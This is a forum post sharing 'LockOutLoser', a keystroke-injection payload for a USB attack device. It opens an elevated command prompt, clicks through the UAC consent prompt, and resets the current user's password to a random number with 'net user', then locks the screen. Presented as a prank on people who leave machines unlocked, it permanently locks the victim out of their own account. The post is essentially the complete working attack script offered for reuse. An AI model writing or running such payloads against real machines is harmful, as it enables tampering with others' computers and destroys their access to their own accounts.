Jump to content

LockOutLoser


jblk01

Recommended Posts

I was bored earlier today and whipped this thing out, it sets the current users password to a random numeric string then locks the screen.

 

ATTACKMODE HID

# They don't lock their system(s)?  Let's do it for them. :)
# Plz improve this.

LED SPECIAL5
Q GUI
Q DELAY 500
Q STRING cmd
Q DELAY 500
Q CTRL-SHIFT ENTER
Q DELAY 500
Q LEFTARROW
Q DELAY 500
Q ENTER
Q STRING 'net user %username% %random%%random%%random%%random%%random%%random%%random%%random%%random%%random%'
Q ENTER
Q STRING exit
Q ENTER
Q GUI l
LED CLEANUP

 

  • Like 1
Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...